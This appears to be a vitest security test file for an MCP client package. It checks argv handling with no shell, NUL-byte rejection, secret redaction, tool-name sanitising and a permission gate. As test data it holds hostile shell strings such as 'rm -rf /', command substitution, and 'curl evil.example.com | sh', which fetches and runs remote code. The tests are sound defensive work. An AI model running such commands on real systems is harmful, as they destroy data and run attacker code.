/**
 * Security properties.
 *
 * Each test here corresponds to a way this package could hand an attacker something.
 * A config file is a plausible attack vector — MCP server blocks get copy-pasted out
 * of READMEs and generated by tools — so "the config said so" is not a reason to trust
 * a value.
 */

import { describe, expect, it } from 'vitest';
import { connectServer } from '../src/client.js';
import { adzeToolName, sanitizeSegment } from '../src/naming.js';
import { describeEnvKeys, SecretRegistry } from '../src/redact.js';
import { buildStdioParameters } from '../src/stdio.js';
import { mcpTools } from '../src/tools.js';
import type { McpServerConfig } from '../src/types.js';
import { ADZE_PREFERRED_REVISION } from '../src/version.js';
import { initializeResult, ScriptedTransport } from './harness.js';

describe('argument injection is inert', () => {
  it('keeps shell metacharacters as literal argv elements', () => {
    const hostile = [
      '; rm -rf /',
      '&& curl evil.example.com | sh',
      '$(whoami)',
      '`id`',
      '| tee /tmp/x',
      '> /etc/passwd',
      'a\nb',
      '$HOME',
      '%PATH%',
    ];

    const outcome = buildStdioParameters({
      name: 'hostile',
      transport: 'stdio',
      command: 'node',
      args: hostile,
    });

    expect(outcome.ok).toBe(true);
    if (!outcome.ok) return;

    // One argv element in, one argv element out, byte for byte. Nothing was split on a
    // separator, quoted, escaped, or joined — because nothing ever built a string.
    expect(outcome.parameters.args).toEqual(hostile);
    expect(outcome.parameters.args).toHaveLength(hostile.length);
  });

  it('never produces a shell string, and never enables a shell', () => {
    const outcome = buildStdioParameters({
      name: 'demo',
      transport: 'stdio',
      command: 'node',
      args: ['a b', '; echo pwned'],
    });
    if (!outcome.ok) throw new Error(outcome.message);

    // The parameters handed to `spawn` carry no `shell` key at all, so the transport's
    // hardcoded `shell: false` cannot be overridden from config. If a future SDK made
    // `shell` honour a caller value, this assertion fails before it can matter.
    expect(Object.hasOwn(outcome.parameters, 'shell')).toBe(false);
    // The command stays exactly one program name; arguments never migrate into it.
    expect(outcome.parameters.command).toBe('node');
  });

  it('treats a command that is only a shell payload as a program name', () => {
    // Inert, not rejected: `spawn` will fail to find a program with this name, which is
    // the correct outcome. What must not happen is a shell interpreting it.
    const outcome = buildStdioParameters({
      name: 'demo',
      transport: 'stdio',
      command: 'sh -c "curl evil.example.com | sh"',
    });
    if (!outcome.ok) throw new Error(outcome.message);
    expect(outcome.parameters.command).toBe('sh -c "curl evil.example.com | sh"');
    expect(outcome.parameters.args).toEqual([]);
  });

  it('refuses a NUL byte rather than letting the OS truncate the argument', () => {
    const inCommand = buildStdioParameters({
      name: 'demo',
      transport: 'stdio',
      command: 'node\0evil',
    });
    expect(inCommand.ok).toBe(false);

    const inArgs = buildStdioParameters({
      name: 'demo',
      transport: 'stdio',
      command: 'node',
      args: ['fine', 'bad\0tail'],
    });
    expect(inArgs.ok).toBe(false);
    if (!inArgs.ok) expect(inArgs.message).toContain('NUL byte in argument 1');
  });

  it('refuses a stdio server with no command instead of spawning a default', () => {
    const outcome = buildStdioParameters({ name: 'demo', transport: 'stdio' });
    expect(outcome.ok).toBe(false);

    const blank = buildStdioParameters({ name: 'demo', transport: 'stdio', command: '   ' });
    expect(blank.ok).toBe(false);
  });

  it('does not hand the child the parent full environment', () => {
    const outcome = buildStdioParameters({
      name: 'demo',
      transport: 'stdio',
      command: 'node',
      env: { MY_TOKEN: 'secret-value-1234' },
    });
    if (!outcome.ok) throw new Error(outcome.message);

    const env = outcome.parameters.env ?? {};
    expect(env.MY_TOKEN).toBe('secret-value-1234');
    // A curated set plus what was configured. Inheriting everything would give every
    // server every credential this process holds.
    expect(Object.keys(env).length).toBeLessThan(Object.keys(process.env).length + 1);
  });

  it('makes a hostile server name inert in the tool name', () => {
    const name = adzeToolName('foo`rm -rf /`; drop', 'read_file');
    expect(name).toBe('mcp__foo_rm_-rf_drop__read_file');
    // Provider-safe alphabet only, so the name cannot carry a payload anywhere.
    expect(name).toMatch(/^[A-Za-z0-9_-]+$/);
  });
});

describe('tool naming', () => {
  it('collapses runs of unsafe characters and never yields an empty segment', () => {
    expect(sanitizeSegment('a;;;b')).toBe('a_b');
    expect(sanitizeSegment('&&&')).toBe('x');
    expect(sanitizeSegment('__lead_trail__')).toBe('lead_trail');
  });

  it('stays inside the provider name limit', () => {
    const name = adzeToolName('a'.repeat(200), 'b'.repeat(20));
    expect(name.length).toBeLessThanOrEqual(64);
    expect(name).toMatch(/^[A-Za-z0-9_-]+$/);
    // The tool segment survives whole: it is what the model uses to tell two tools on
    // one server apart, so the server segment is what gets shortened.
    expect(name.endsWith('b'.repeat(20))).toBe(true);
  });

  it('keeps the tail of a tool name too long to fit at all', () => {
    const name = adzeToolName('server', 'x'.repeat(120));
    expect(name.length).toBeLessThanOrEqual(64);
  });

  it('namespaces so a server cannot shadow a built-in tool', () => {
    // `ToolRegistry.register` throws on a duplicate, so an unprefixed `read` from a
    // server would take down the session at registration.
    for (const builtin of ['bash', 'read', 'write', 'edit', 'todo', 'task']) {
      expect(adzeToolName('any', builtin)).not.toBe(builtin);
    }
  });
});

describe('credentials do not leak', () => {
  const SECRET = 'sk-live-abcdef0123456789';

  it('redacts a secret wherever it is framed, including percent-encoded', () => {
    const secrets = new SecretRegistry([{ TOKEN: SECRET }]);
    expect(secrets.redact(`Bearer ${SECRET} failed`)).toBe('Bearer [redacted] failed');
    expect(secrets.redact(`https://x.example/?k=${encodeURIComponent(SECRET)}`)).toBe(
      'https://x.example/?k=[redacted]',
    );
  });

  it('redacts the longer of two overlapping secrets first', () => {
    const short = 'abc123';
    const long = `${short}-def456`;
    const secrets = new SecretRegistry([{ A: short, B: long }]);
    // Shortest-first would cut the long value in half and leave its tail exposed.
    expect(secrets.redact(`value=${long}`)).toBe('value=[redacted]');
  });

  it('leaves short configuration values alone', () => {
    const secrets = new SecretRegistry([{ DEBUG: '1', MODE: 'dev' }]);
    expect(secrets.size).toBe(0);
    expect(secrets.redact('1 dev debugging')).toBe('1 dev debugging');
  });

  it('names environment keys and never their values', () => {
    expect(describeEnvKeys({ GITHUB_TOKEN: SECRET, B_KEY: 'another-secret' })).toBe(
      'B_KEY, GITHUB_TOKEN',
    );
    expect(describeEnvKeys({ GITHUB_TOKEN: SECRET })).not.toContain(SECRET);
    expect(describeEnvKeys(undefined)).toBe('(none)');
  });

  it('keeps a secret out of a failed connect message', async () => {
    const transport = new ScriptedTransport(() => ({
      error: { code: -32603, message: `auth failed for token ${SECRET}` },
    }));

    const outcome = await connectServer(
      {
        name: 'demo',
        transport: 'stdio',
        command: 'node',
        env: { GITHUB_TOKEN: SECRET },
        connectTimeoutMs: 500,
      },
      { transport },
    );

    expect(outcome.ok).toBe(false);
    if (outcome.ok) return;
    expect(outcome.message).not.toContain(SECRET);
    expect(outcome.message).toContain('[redacted]');
    // The variable name is the useful half and is safe to report.
    expect(outcome.message).toContain('GITHUB_TOKEN');
  });

  it('keeps a secret out of a tool result and out of a tool error', async () => {
    const config: McpServerConfig = {
      name: 'demo',
      transport: 'stdio',
      command: 'node',
      env: { TOKEN: SECRET },
    };
    const transport = new ScriptedTransport((request) => {
      if (request.method === 'initialize') return initializeResult(ADZE_PREFERRED_REVISION);
      if (request.method === 'tools/list') {
        return { result: { tools: [{ name: 'leak', inputSchema: { type: 'object' } }] } };
      }
      return {
        result: { content: [{ type: 'text', text: `used ${SECRET} to authenticate` }] },
      };
    });

    const outcome = await connectServer(config, { transport });
    if (!outcome.ok) throw new Error(outcome.message);

    const result = await outcome.connection.callTool('leak', {}, undefined);
    expect(JSON.stringify(result)).not.toContain(SECRET);
    expect(JSON.stringify(result)).toContain('[redacted]');

    await outcome.connection.close();
  });

  it('keeps a secret out of a descriptor and out of the tool the model sees', async () => {
    const transport = new ScriptedTransport((request) =>
      request.method === 'initialize'
        ? initializeResult(ADZE_PREFERRED_REVISION)
        : { result: { tools: [{ name: 'read', inputSchema: { type: 'object' } }] } },
    );

    const outcome = await connectServer(
      {
        name: 'demo',
        transport: 'stdio',
        command: 'node',
        env: { TOKEN: SECRET },
      },
      { transport },
    );
    if (!outcome.ok) throw new Error(outcome.message);

    // Descriptors and tool specs are what reach a provider request and a trajectory
    // artifact, which is published beside a benchmark report.
    expect(JSON.stringify(outcome.connection.discovery)).not.toContain(SECRET);
    expect(JSON.stringify(mcpTools(outcome.connection))).not.toContain(SECRET);

    await outcome.connection.close();
  });
});

describe('the permission gate stays in the path', () => {
  const config: McpServerConfig = {
    name: 'demo',
    transport: 'stdio',
    command: 'npx',
    args: ['-y', 'some-server'],
    cwd: '/work',
  };

  async function connectDemo(overrides: Partial<McpServerConfig> = {}) {
    const transport = new ScriptedTransport((request) =>
      request.method === 'initialize'
        ? initializeResult(ADZE_PREFERRED_REVISION)
        : {
            result: {
              tools: [
                {
                  name: 'search',
                  inputSchema: { type: 'object' },
                  annotations: { readOnlyHint: true },
                },
                { name: 'mutate', inputSchema: { type: 'object' } },
              ],
            },
          },
    );
    const outcome = await connectServer({ ...config, ...overrides }, { transport });
    if (!outcome.ok) throw new Error(outcome.message);
    return outcome.connection;
  }

  it('declares a command effect for stdio so the gate can authorize it', async () => {
    const connection = await connectDemo();
    const tool = mcpTools(connection)[0];
    const prepared = tool?.prepare({});
    if (prepared === undefined || !prepared.ok) throw new Error('prepare failed');

    // Declared before anything runs, which is what makes the gate enforceable rather
    // than advisory. Over-declared on purpose: see the note in tools.ts.
    expect(prepared.call.effects({ workspaceRoot: '/ws' })).toEqual([
      { kind: 'command', command: ['npx', '-y', 'some-server'], cwd: '/work' },
    ]);

    await connection.close();
  });

  it('declares a network effect naming the host for http', async () => {
    const transport = new ScriptedTransport((request) =>
      request.method === 'initialize'
        ? initializeResult(ADZE_PREFERRED_REVISION)
        : { result: { tools: [{ name: 'search', inputSchema: { type: 'object' } }] } },
    );
    const outcome = await connectServer(
      { name: 'remote', transport: 'http', url: 'https://mcp.example.com/v1' },
      { transport },
    );
    if (!outcome.ok) throw new Error(outcome.message);

    const prepared = mcpTools(outcome.connection)[0]?.prepare({});
    if (prepared === undefined || !prepared.ok) throw new Error('prepare failed');
    // Exactly what a sandbox `allowedNetworkHosts` list is checked against.
    expect(prepared.call.effects({ workspaceRoot: '/ws' })).toEqual([
      { kind: 'network', host: 'mcp.example.com' },
    ]);

    await outcome.connection.close();
  });

  it('honours autoApprove only when the server declares the tool read-only', async () => {
    const connection = await connectDemo({ autoApprove: ['search', 'mutate'] });
    const byName = new Map(connection.discovery.tools.map((tool) => [tool.remoteName, tool]));

    expect(byName.get('search')?.autoApprove).toBe(true);
    // A config file asserting a mutating tool is safe is exactly the bypass the gate
    // exists to prevent, so the request is dropped and reported.
    expect(byName.get('mutate')?.autoApprove).toBe(false);
    expect(connection.discovery.warnings.join(' ')).toContain(
      "autoApprove names 'mutate', but the server does not declare it read-only",
    );

    await connection.close();
  });

  it('warns when autoApprove names a tool the server does not offer', async () => {
    const connection = await connectDemo({ autoApprove: ['typo_tool'] });
    expect(connection.discovery.warnings.join(' ')).toContain(
      "autoApprove names 'typo_tool', which this server does not offer",
    );
    await connection.close();
  });

  it('declares the same effects for a read-only tool as for a mutating one', async () => {
    // `readOnly` feeds approval policy, not the effect declaration. What Adze *does* is
    // talk to the server either way, and narrowing the declaration because the server
    // called itself read-only would be trusting the server to police Adze.
    const connection = await connectDemo({ autoApprove: ['search'] });
    const tools = mcpTools(connection);
    const readOnly = tools.find((tool) => tool.name === 'mcp__demo__search');
    const mutating = tools.find((tool) => tool.name === 'mcp__demo__mutate');

    const first = readOnly?.prepare({});
    const second = mutating?.prepare({});
    if (first === undefined || !first.ok || second === undefined || !second.ok) {
      throw new Error('prepare failed');
    }
    expect(first.call.effects({ workspaceRoot: '/ws' })).toEqual(
      second.call.effects({ workspaceRoot: '/ws' }),
    );

    await connection.close();
  });
});
